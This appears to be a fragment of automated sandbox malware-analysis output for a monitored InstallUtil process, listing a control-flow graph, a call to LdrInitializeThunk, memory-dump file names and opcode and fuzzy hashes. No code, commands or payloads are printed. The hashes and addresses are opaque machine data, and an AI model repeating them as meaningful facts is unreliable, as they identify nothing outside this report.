                                                                                                                                  • Instruction Fuzzy Hash: EF222674E002598FDB14DFA9C884B9DBBF2BF88300F1085A9D409AB396DB359D86CF51

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1636 bec76c 1637 bec82b-bec83c 1636->1637 1638 bec83e 1637->1638 1639 bec843-bec84c 1637->1639 1638->1639 1641 bec852-bec865 1639->1641 1642 bec623-bec648 1639->1642 1645 bec86c-bec887 1641->1645 1646 bec867 1641->1646 1643 bec64f-bec686 1642->1643 1644 bec64a 1642->1644 1654 bec68d-bec6bf 1643->1654 1655 bec688 1643->1655 1644->1643 1647 bec88e-bec8a2 1645->1647 1648 bec889 1645->1648 1646->1645 1652 bec8a9-bec8bf LdrInitializeThunk 1647->1652 1653 bec8a4 1647->1653 1648->1647 1656 bec8c1-bec9bf 1652->1656 1653->1652 1661 bec723-bec736 1654->1661 1662 bec6c1-bec6e6 1654->1662 1655->1654 1659 bec9c7-bec9d1 1656->1659 1660 bec9c1-bec9c6 call be5ca8 1656->1660 1660->1659 1664 bec73d-bec762 1661->1664 1665 bec738 1661->1665 1666 bec6ed-bec71b 1662->1666 1667 bec6e8 1662->1667 1671 bec764-bec765 1664->1671 1672 bec771-bec7a9 1664->1672 1665->1664 1666->1661 1667->1666 1671->1641 1673 bec7ab 1672->1673 1674 bec7b0-bec811 call bec168 1672->1674 1673->1674 1680 bec818-bec82a 1674->1680 1681 bec813 1674->1681 1680->1637 1681->1680
                                                                                                                                  APIs
                                                                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 00BEC8AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3285147470.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_be0000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 6bfa75d3a0128bf59841bf9a511680046cad3b1906677f796719543120da3dbf
                                                                                                                                  • Instruction ID: dbdbe7d0fbb4259b53b4ece8ec918435fb23182c26e1d7a456588cecd8ce6465
                                                                                                                                  • Opcode Fuzzy Hash: 6bfa75d3a0128bf59841bf9a511680046cad3b1906677f796719543120da3dbf
                                                                                                                                  • Instruction Fuzzy Hash: FB113D74E011499FDB04DFAAD584ABDBBF5FF88305F6481A5E804A7242D730D942CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3284698318.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_b9d000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6f264f55b74747b427325090ed3c47083acdc0c2319b82df1c6d1790a0f1772b
                                                                                                                                  • Instruction ID: 389f59fa6cd7641bbf269a0a364aa20c973054965ff377766eb98fa981d5753b
                                                                                                                                  • Opcode Fuzzy Hash: 6f264f55b74747b427325090ed3c47083acdc0c2319b82df1c6d1790a0f1772b
                                                                                                                                  • Instruction Fuzzy Hash: 402164755093C49FCB138B24D9A0711BF71EB46214F28C5EBD9858B1A3C23A980AC762
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3284698318.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_b9d000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1da7bb02ad1f9918062e7719d52f32174d25ecdbd3076989ccef5decf3f5b20b
                                                                                                                                  • Instruction ID: 85f5bff12a61e7cca9a4fb8b0c8dcf723964b66f60bcc81f6023388fe73be841
                                                                                                                                  • Opcode Fuzzy Hash: 1da7bb02ad1f9918062e7719d52f32174d25ecdbd3076989ccef5decf3f5b20b
                                                                                                                                  • Instruction Fuzzy Hash: 7421D071604204DFDF14DF25D9D0B26BBA5FB88314F24C6B9D9094B296C33AD846CA62